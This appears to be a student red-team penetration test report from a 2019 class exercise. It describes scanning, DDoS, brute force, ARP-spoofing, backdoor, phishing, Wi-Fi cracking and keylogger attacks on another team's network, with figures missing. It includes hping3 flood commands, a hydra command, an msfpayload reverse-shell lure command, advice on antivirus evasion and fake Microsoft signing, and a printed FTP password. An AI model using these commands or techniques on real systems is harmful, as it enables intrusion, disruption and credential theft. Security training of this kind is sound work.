Professional Documents
Culture Documents
Penetration Test
RED TEAM 2
Ahmet
Shkoza
Erion Sina
Fabiola
Xhelili
Fjoralba
Shehaj
Gerhard
Arifi Igli
Shkreta
Matilda
Hala
Romina Marqeshi
28 March
2019
1 Co nte nt s
1 CONTENTS
................................................................................................................ 1
2 TABLE OF FIGURES
....................................................................................................... 2
3 EXECUTIVE
SUMMARY................................................................................................... 5
4 INTRODUCTION
.......................................................................................................... 6
5 SCOPE
...................................................................................................................... 8
6 SCANNING
................................................................................................................10
6.1 NMAP
..............................................................................................................10
6.2 TCP SCAN
.........................................................................................................11
6.3 SYN SCAN
.........................................................................................................13
6.4
SPARTA.............................................................................................................15
6.5 NESSUS
.............................................................................................................16
6.6 ACUNETIX
.........................................................................................................19
7 ATTACK PHASE
..........................................................................................................20
7.1 DDOS
..............................................................................................................20
7.1.1 TCP SYN FLOOD
.........................................................................................21
7.1.2 GOLDEN
EYE ...............................................................................................22
7.2 BRUTE FORCE ATTACK
.........................................................................................23
7.3 MAN IN THE MIDDLE ATTACK
.................................................................................25
7.3.1 SNIFFING FTP PACKETS WITH DSNIFF- ARP SPOOFING MITM
ATTACK........................25
7.3.2 SNIFFING WITH CAIN &
ABEL............................................................................27
8 FTP SERVER FUZZING
..................................................................................................37
9 BACKDOOR
..............................................................................................................38
9.1 BACKDOOR CREATED USING METASPLOIT
...................................................................38
9.2 CREATE FUD BACKDOOR TO BYPASS ANTIVIRUS
...........................................................39
10 SNMP
SNIFF ..............................................................................................................42
11 SOCIAL ENGINEERING
..................................................................................................43
11.1 CREATION OF A ZIPBOMB AND SENDING IT WITH A MAIL.
.................................................43
11.2 SENDING MALICIOUS FILES
......................................................................................44
12 REMOTE DESKTOP PROTOCOL (RDP) SCAN AND ATTACK
......................................................46
13 HACKING WI-FI
.........................................................................................................47
14 HACKING THE JUMP MACHINE
.......................................................................................52
15 SUMMARY
................................................................................................................62
1
2 Ta ble of Fig ures
Figure 1. Network scanning using nmap ...................................................................................... 10
Figure 6. SPARTA Scan, In the hosts field, the ip address of the target defined in the left and in the right
are shown the results
................................................................................................................. 15
2
Figure 23. Detailed information of the certificates
......................................................................... 36
Figure 44.
Deauthentication....................................................................................................... 50
Figure 45. Sniffing from wireless traffic of the AP
.......................................................................... 50
3
Figure 52. Victim machine-cmd ...................................................................................................
54
RED TEAM 2 was engaged to conduct a focused External Network Penetration Test on a
quantified number of services in the network of BLUE TEAM 2. The purpose of this
engagement was to identify and prioritize the security vulnerabilities on the identified systems.
The engagement was launched on 01.03.2019 and included 27 days of planning, testing,
analyzing and documentation.
The following security issues were identified during the course of the Network Penetration Test:
5
4 I ntro duct io
n
The project of penetration test conducted from RED TEAM 2 followed all the stages of a
standard external penetration test: Planning, Gathering Information, Discovering Vulnerabilities
and Reporting.
The team was gathered on 1. March in a Kick off Meeting where we discussed on planning and
defining the scope and goals of the project. Furthermore, it was selected the team leader who
would be in charge of controlling all the phases of the project and giving support to all the
members.
Team leader: Ahmet Shkoza
Table 1 – Kick off meeting
Fjoralba Shehaj
Erion Sina
6
8. Man In the Middle Attack Gerhard Arifi 22/03/2019
Ahmet Shkoza
Erion Sina
7
5 Sco pe
The scope of the project is to discover the infrastructure of BLUE TEAM 2 and to attack it in
order to gain access to their services. The project will evaluate the security weaknesses of BLUE
TEAM 2’s network systems, will identify the gap of the system security and prepare some
penetration test recommendations to reduce the threat.
All activities were conducted in a manner that simulated a malicious actor engaged in a targeted
attack against Blue Team 2 with the goals of:
- Identifying if a remote attacker could penetrate Blue Team 2 infrastructure.
- Determining the impact of a security breach on the confidentiality of the infrastructure
- Determining the impact of a security breach on the availability of Blue Team 2
information systems
Efforts were placed on the identification and exploitation of security weaknesses that could allow
a remote attacker to gain unauthorized access to organizational data. The attacks were conducted
with the level of access that a general Internet user would have. The assessment was conducted
in accordance with all tests and actions being conducted under controlled conditions.
RED TEAM 2 will use Kali Linux’s tools to perform the attacks.
The tools that will be used are:
8
12. Windows Spy Keylogger
File Server
Web Server
Mail Server
Wi-Fi AP
9
6 Sca
nning
In the pre-scanning phase, the services that are offered from the Blue Team 2 are already
specified. To get a deeper insight, different tools are used for scanning, in order to get as much
information as possible to penetrate the system. For the purposes of this assessment, our team
has provided the only information that can be used for scanning, which is the WAN interface IP
address (public IP address of the firewall, that is the gateway to the whole system)
Operating System used: Kali Linux, Windows
Tools used: nmap, Metasploit, Nessus, Sparta, Acunetix
The first day resulted that all the ports were filtered. Next day we continued to scan and resulted
that port 21 was opened. The result was helpful to understand that Blue Team 2 had a FTP
service which was unencrypted. This finding was important for the next step of attacking the
FTP server.
6.1 Nmap
10
Figure 2. Port scanning using nmap
11
Figure 3. Port scanning using Metasploit
The number of threads can also be increased to help the scan run faster To be safe, we can set
this to something like 8. Now we're ready to start the scan. In Metasploit, the run command is
simply an alias for exploit, so it will do the exact same thing. Given we are only conducting
scans, run seems more appropriate, though it really doesn't matter.
12
Figure 4. TCP scanning using Metasploit
13
Figure 5. SYN scanning using Metasploit
14
6.4 Sparta
Also the application of Sparta has nmap integrated, so the result from both tools is almost the
same, but Sparta runs more tools like Nikto, Hydra and is a GUI application.
Figure 6. SPARTA Scan, In the hosts field, the ip address of the target defined in the left and in the right
are shown the results
Results of Sparta:
- FTP server is Filezilla ftpd: port 21 is unencrypted while port 990 is encrypted
- Web Server is Apache, the framework used for the web is Laravel
- Firewall is based on Nginx Server
- Ticketing System – a portable version of OpenSSH, a free implementation of the Secure
Shell protocol in Ubuntu Linux
15
6.5 Nessus
Nessus is used to get a more detailed report that we could use to find breaches on the target
system. It identifies vulnerabilities, like software flaws, missing patches, malware, and
misconfigurations across the target operating systems and applications
Figure 2 shows the detailed report which lists the Vulnerabilities and their level of severity.
Result of Nessus:
16
17
Figure 7- Nessus scanner results
18
6.6 Acunetix
To have a better view of the web server and framework, was used Acunetix Scanner. Acunetix
tests for SQL Injection, XSS, XXE, SSRF, Host Header Injection and other web vulnerabilities.
From the scan made several times, the results were the same:
Directory listing makes it easier to identify the resources at a given path, exposing sensitive
files; it doesn’t necessarily create a security vulnerability, which means that the resources
cannot be accessible from unauthorized parties.
Suggested solution: correctly configuring web server for the paths beneath the web root
Alerts related to cookies instruct that the cookie can be accessed not in secure channels
What makes this application interesting, that is more web-oriented and can give hints of
problems related to the web service.
19
Figure 8- executive summary from acunetix scanner
The framework used is Laravel, that comes out of the box with already implemented security
features. Hence, most of the vulnerabilities detected from Acunetix have a very low likelihood
and severity. In this aspect, those vulnerabilities are difficult to exploit.
Scanning phase has continued every day to check.
7 A ttac k
phase
7.1 DDoS
A distributed denial of service (DDoS) attack is an attempt to make a service unavailable. Unlike
other kinds of attacks, which establishes foothold or hijacks data, DDoS attacks do not threat
sensitive information. It is just an attempt to make a service unavailable to legitimate users. In
our scenario, we used DDoS for taking down web application firewall.
Network and Transport Layer Attacks
These types of attacks focus on targeting the transport and network layers.
These usually consist of volumetric attacks that aim to overwhelm the target
machine with malicious traffic and consuming all resources and making server unresponsive.
20
7.1.1 TCP SYN FLO
OD
The aim of SYN flood is sending lots of SYN packets to the server and ignoring SYN+ACK
packets returned by the server.
If an attacker sends enough SYN packets, this will overwhelm the server because servers are
limited in the number of concurrent TCP connections. If the server reaches its limit, it cannot
establish new TCP connections until the existing connections which are in the SYN-RCVD
state timeout.
In order to perform SYN flood attacks we have used hping3.
hping3 is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de-
facto tools for security auditing and testing of firewalls and networks, and was used to exploit the
Idle Scan scanning technique now implemented in the Nmap port scanner. The new version of
hping, hping3, is scriptable using the Tcl language and implements an engine for string based,
human readable description of TCP/IP packets, so that the programmer can write scripts related
to low level TCP/IP packet manipulation and analysis in a very short time.
root@kali:~# hping3 -S --flood -V -p TARGET_PORT TARGET_SITE
hping is a command-line oriented TCP/IP packet assembler/analyzer. It supports TCP, UDP,
ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered
channel, and many other features.
It is used in our case it used traceroute mode, was verbose in ICMP mode and it could
successfully shut down the firewall, making its public IP unreachable.
Also we tried Advanced SYN flood with random source IP, different data size, and window size:
21
root@kali:~# hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source
TARGET_SITE
–flood: sent packets as fast as possible
–rand-source: random source address
-c –count: packet count
-d –data: data size
-S –syn: set SYN flag
-w –win: winsize (default 64)
-p –destport: destination port (default 0)
7.1.2 GOLDEN E
YE
GoldenEye is a HTTP Denial of Service Tool in Python. It uses KeepAlive paired with Cache-
Control options to persist socket connections, busting through caching (when possible) until it
consumes all available sockets on a HTTP/S server.
GoldenEye changes generated requests dynamically, it randomizes user agents, referrers and
almost all of the various parameters used.
Our attack parameters:
Number of workers:10
Connection/wrk: 500
NoSSLcheck: True (as their firewall has a self-signed ssl certificate)
Method : GET
22
7.2 Brute Force Attack
It was made a great effort from our team to realize a Brute Force Attack but unfortunately
resulted unsuccessful. The tool used for cracking the password was Hydra, as it is the best
password cracking tool. As it is shown in the figure below, the passwords were all encrypted
very well and we could not crack any.
For brute forcing Hydra needs a list of passwords. There are lots of password lists available. The
password list is pre-installed on Kali Linux and its password list can be found at the following
location:
/root/Desktop/bruteforce-database-master/word.lst
The command used in kali Linux was:
# hydra –l admin –P /root/Desktop/bruteforce-database-master/word.lst –e ns –m https:
10.100.200.34:3333 –vV 10.100.200.34 http-get
The option “l” tells the username or login to
use.
Next comes the capital “P” option which provides the word list to use. Hydra will pick up each
line as a single password and use it.
The option “-e ns” is used to try "n" null password, "s" login as pass.
The option -m provides the list of servers to be attacked in parallel, one entry per line
The “v” option is for verbose and the capital “V” option is for showing every password being
tried. Last comes the host/IP address followed by the service to crack.
23
Figure 11. Brute force with Hydra
Another step was trying to crack the username and password, done from Sparta application. The
files used for this attack were txt files, containing guessed words for the passwords.
The target IP: Public IP of the firewall
Target Port: 3333
Comand used: Send to brute
Service: https-post
Username known: admin or Dekra
24
7.3 Man In the Middle At
tack
Scenario:
The first step is to configure our attacking machine to enable packet forwarding. This will allow
our attacking machine to mimic itself as the router. Tricking the victim machine into thinking it’s
connecting to the router but really it will be connecting back to the attacking machine.
The first step is to configure our attacking machine to enable packet forwarding, this will allow
our attacking machine to mimic itself as the router. Tricking the victim machine into thinking it’s
connecting to the router but really it will be connecting back to the attacking machine.
For packet forwarding, you need to open a new terminal and type
“echo 1 > / proc/ sys/net/ipv4/i
p_forward“.
Our Target IP address will be :
Now the next step is to setup a arpspoof between victim and router. Arpspoof is a command line
utility that allows us to intercept packets on a switched LAN. This is an extremely effective way
of sniffing traffic on a switch.
26
In above screenshot, we successfully sniffed the login and password information of FTP
protocol.
Recommendation:
1- Disck Quotas
2- Access by IP
7 . 3 . 2 S N I F F I N G W I T H C A I N & ABEL
Step 1:
First we turned off the windows firewall or any other third-party firewall, so that all the packets
are captured efficiently.
Step 2:
Open Cain and Abel tool
27
Step 3:
Then we switched to Sniffer Tab and clicked Configure in the main menu to configure our
packet listening adapter.
Step 4:
Selected the appropriate network adapter for our network that we wanted to sniff the packets for
plain-text passwords. Click Ok.
28
Figure 17. Selection of network adapter
Step 5:
The Green Adapter must be clicked to turn on the network adapter that we just configured.
29
Step 6:
By scanning the network we populated the table with all pc’s on our LAN.
Step 7:
Now select the APR tab below as shown and now first click on the right side upper pane area.
When we click that area the blue plus (“+”) icon will get enabled. Let’s press that blue plus (“+”)
icon.
30
Figure 20. Selecting APR tab
Step 8:
Now we need to select the firewall`s IP address and click ok. This means that we want to listen
to every packet that is sent to firewall. If we select any other IP address in our LAN network then
we can listen to only that particular HOST on the network. Since the router responds to all the
request of HOSTS connected in a LAN, we can listen to all the HOSTs. Now we click the
Yellow Circle icon as shown. This means that we are starting ARP poisoning.
31
Figure 21. Packet Listening to select the Firewall IP
On the picture below we can see the full poisoning for the firewall IP address
32
Figure 22. Poisoning for the firewall IP address
Step 9:
33
Figure 23. Sniffing results
34
Figure 24. Certificates of the visited websites
By right-click on a specific certificate file we can get valuable information about different
subjects of that certificate, as shown is the picture below.
35
Figure 25. Detailed information of the certificates
Aside from finding the vulnerabilities of the first interface with the the Blue Team 2, which was
the firewall, the next step was testing the services the Blue Team has created.
36
8 FTP Server Fuzz ing
FTP server may be vulnerable to buffer overflow is a relatively simple protocol, but due to the
high number of commands and various parameters.
Tool used: Infigo FTPStress Fuzzer, it allows a user to define FTP commands that need to be
tested and the length and type of data that will be sent to the target application.
Operating system: Windows
37
9 Bac
kdoor
Username : dekra
Password: Bt22019
We tried to realize a backdoor by inserting a zip file in their File Server that contained a .exe file
created with Metasploit.
The file was created with the following command:
root@Kali: /opt/metasploit-4.4.0/msf3# msfpayload windows/meterpreter/reverse_tcp lhost=
10.100.200.x lport=4444 x > passwordet e juja te leshit.exe
After creating the file, we zipped it so that the payload would appear only some KB. The name
of the file was set to encourage curiosity of the Blue Team 2, so that they would open the zip. In
case they would have opened the zip the payload could have made the server unreachable. Being
that Blue Team2 was aware of our attacks, this scenario never happened to succeed. Anyway we
continue to have access to their FTP server without being noted or prevented from them. This is
a critical finding because in a real scenario, we could have access to important documents and
files.
Format : Executable
Payload library : Msfvenom
Sign Executable : Microsoft Certificate, (prenting pop-up a warning alerting the user that the
executable is from an unknown source, instead it will be recognized as a Microsoft app)
39
Check file hash & file on Virustotal.com
40
Figure 32. Backdoor session created successfully
Now if we type “sysinfo” we get the information from the Windows 10 machine. If we need to
get a full shell session instead of using the Metasploit’s one, we have to type “shell”.
Metasploit has a script named persistence that can enable us to set up a persistent Meterpreter
(listener) on the victim's system. In our case the persistence step was not successful because of
the security restrictions.
41
10 SNMP s niff
The Simple Network Management Protocol (SNMP) is the most basic method of gathering
bandwidth and network usage data. It can be used to monitor bandwidth usage of routers and
switches port-by-port, as well as device readings like memory, CPU load etc.
By monitoring the snmp traffic we could find the password of snmp. In our case snmp was not
configured and it was used version 1, which itself presents a vulnerability because of using
unencrypted communication.
If our scenario would work and the snmp would be configured, further we could raise a network
monitor. By putting the found password of the snmp, we could discover all their network devices
and have control on them.
42
11 Soc ial eng ineering
1 1 . 1 C r e a t i o n o f a zi p b o m b a n d s e n d i n g i t wi t h a m a i l .
A zip bomb, also known as a Zip of Death or decompression bomb, is a malicious archive file
designed to crash or render useless the program or system reading it.
Operation system used: Windows
Scenario: The folder is sent as a report from the IT Department, and the employee, not knowing
what exactly the ITCheckResults.zip contains, opens it.
43
11.2 Sending malicious files
Tool used: Metasploit Framework
Vulnerability exploited: the Adobe Reader ‘util.printf()’ JavaScript Function Stack Buffer
Overflow
Step 1: Enter the module of adobe_utilprintf
Step 2: Use reverse shell (setting payload)
Step 3: Setting localhost and localport (the IP address to which the target machine connects to,
the port that the listener binds to)
Step 4: Creation of the malicious file
Step 5: Setting up the listener to capture the reverse connection
The mail can be send using using a little script in the Kali terminal, or just sending it as a simple
user would do, attaching the file and sending it with the e-mail.
44
Figure 37. Reverse TCP
In a real-life scenario, the file would be opened from the employee which is not aware of the
risk. In the case, the Blue Team 2 was aware of the attacks that Red Team 2 was doing, so they
didn’t click on the file.
45
12 Re mo te Des ktop Protoco l (RDP) sca n a nd a ttac k
From the information we gathered during our scanning sessions and enumerations, was found
that their RDP service is enabled and uses port 3390 (instead of 3389 by default).
To identify if the host is vulnerable to a RDP attack, we’ll use MS12-020-check exploit from
Metasploit.
Framework : Metasploit
Module(s) : scanner/rdp/ms12_020_check , dos/windows/rdp/ms12_020_maxchannelids
MS12-020-check : this vulnerability could allow remote code execution if an attacker sends
sequence of specially crafted RDP packets to an affected system. https://docs.microsoft.com/en-
us/security-updates/SecurityBulletins/2012/ms12-020
46
Results: From the output of Metasploit module we received “Service Unreachable” after sending
the crafted RDP packets, which means that we were able to disrupt their RDP service for some
seconds or this may be a false positive alarm.
Improvements
Reference : https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-020
13 Hac king Wi -f i
For this hacking method we need a wireless network adapter that supports monitor mode. Our
laptop’s wireless network card could also work, but generally an external Card with extended
range capability is advised. In our testing we have used a USB WiFi Wireless Adapter Ethernet
Dual Antenna Long Range. Like the one in the picture below with a 150 Mbps capability
Step 1.
47
Figure 42. Wireless traffic monitor
Step 2.
48
Figure 43. Target Victim
Step 3.
On our next step we focus our efforts on Blue Team AP, on one channel, and capture traffic
data from it. We use the following command;
step 4.
In order to capture the encrypted password, we need to have the client authenticate against
the AP. If they're already authenticated, we can de-authenticate them (kick them off) and
their system will automatically re-authenticate, whereby we can grab their encrypted
password in the process. To make this process possible, we use the following command;
49
Figure 44. Deauthentication
Now we wait until we sniff enough packets from the wireless traffic of the AP, in order to get the
WPA handshake.
50
Step 5.
Now we have our Wteam2.cap which contains the encrypted PASSWORD. Our last step is to
crack the password from this file. There are several methods to try cracking an encrypted
password. If we have a good wordlist we try with aircrack-ng command, because it has a high
testing capability, obviously based on our hardware capabilities. So now test Wteam2 packets
file again our wordlist which contains a high number of possible passwords.
51
14 Hac king t he Jump Mac hine
The main purpose of this kind of attack is to reach the jump machine that the target IT Admins
are using to login in their Environment with the final goal to get users and passwords. To make
this possible we decided to hack first a local PC we were using in our class supposing that the
image used from KPT is the same everywhere (including the jump machine). Once we have the
local Admin password (which can be the same in every PC of KPT), we can control the jump
machine.
52
4. Decrypt Hashes with online decryptor (www.onlinehashcrack.com)
53
6. Open CMD of the target victim PC with PsTools (psexec command)
After loging in our compromised PC with the local Admin account (pcadmin), we will
run the target PC command prompt using PsExec of Pstools.
54
9. Disable Firewall (Windows Defender)
In this step we will disable temporally Windows Defender.
55
11. Excluding “kot” folder from firewall
In this way we are safe to proceed coping the tool and installing it on this excluded path.
56
13. Testing the keylogger is active
In this step we are simulating the victim is typing and we see the log file being populated.
57
2. Finding the User and Password of Domain User (potentially domain admin)
4. Login to Windows machine and confirming that the found credentials are working
In this step we will use the username and password extracted from logs to login in their
Environment (in this case a Windows Machine). The Certificate acceptance prompt
means that our credentials are right ones.
58
5. Finding the IP of DNS (potentially the Domain Controller IP)
After login we figure out (from the enabled Roles) that this machine is not their most
important one (Hyper-V or Domain Controller) . The next step will be to reach the DC.
6. Login to the Windows Machine (which results to be their DC and Hyper-V Server):
Using the same credentials we were able to login in their Domain Controller which has
AD, DNS and Hyper-V roles enabled.
59
7. Hello Team
No comment..
60
10. Exploring the Firewall
In this step we will login and explore their Firewall.
11. No Nat configured for VPN peer (means that VPN does not Work)
The VPN peer is not accessible from outside which means that the VPN peer cannot be
reached.
61
15 Summary
Initial reconnaissance of the Blue Team network resulted in the discovery of a pfSense appliance
in the Firewall, also Snort monitoring system that make the internal system isolated from
external attacks.
The results provided us with a listing of specific services to target for this assessment. An attack
revealed the credentials of the FTP server. After a few trials we were not able to gain access to
this server by uncovering the password via brute-force by Hydra. Another try was to prove its
vulnerability from buffer overflow.
After obtaining the access to the FTP server, it was kept and we added malicious files inside it
that would cause the crash of system leading to data corruption.
Also, we created a malicious file and a Zipbomb in order to send it via e-Mail (target was SMTP
Server) using social engineering. At the moment, that the employee inside the ‘Company’ clicks
the files which have legit and realistic names, it brings application crashing and denial of service
to the legitimate users.
After a closer examination, we discovered that RDP service of the target system is vulnerable to
remote code execution with the flow of crafted RDP packets, so after exploitation the RDP
service was disrupted for some seconds or this may be a false positive alarm.
A successful exploitation consisted into creating a persistent backdoor with reverse HTTP, which
could get the shell access of the target at the moment that the user clicks it (what may bring the
user to the click is social engineering).
Privilege Escalation through windows flaws made possible to us to install a keylogger in the
Blue Team 2 client PC. After successfully install, we were able to catch all inputted passwords
and therefore we gained access to all their infrastructure.
Blue Team 2 suffered a series of control failures, which led to a potential compromise of
sensitive system assets.
These failures would have had a dramatic effect on the services that this ‘Company’ offers if a
malicious party had exploited them.
FTP and Web service were vulnerable to MITM attack, also the creation of backdoor which
cannot be detected from the antivirus,
The specific goals of the penetration test were stated as:
- Identifying if a remote attacker could penetrate the Blue Team 2 firewall
- Determining the impact of a security breach on:
62
- Confidentiality of the company’s information
- Availability of Blue Team 2 information systems
These goals of the penetration test were met. A targeted attack against Blue Team 2 can result in
a potential compromise of organizational assets.
63
Appendix A
References
[1] https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/
[2] https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/
[3] http://pentestmonkey.net/tools/user-enumeration/smtp-user-enum
[4] http://securitytools.wikidot.com/fuzzing
[5] https://www.infigo.hr/files/infigo-td-2006-04-01-fuzzing-eng.pdf
[6] https://securityaffairs.co/wordpress/22294/cyber-crime/thousands-ftp-servers-infected.html
[7] https://www.acunetix.com/vulnerabilities/
[8] https://www.tenable.com/plugins/nessus
64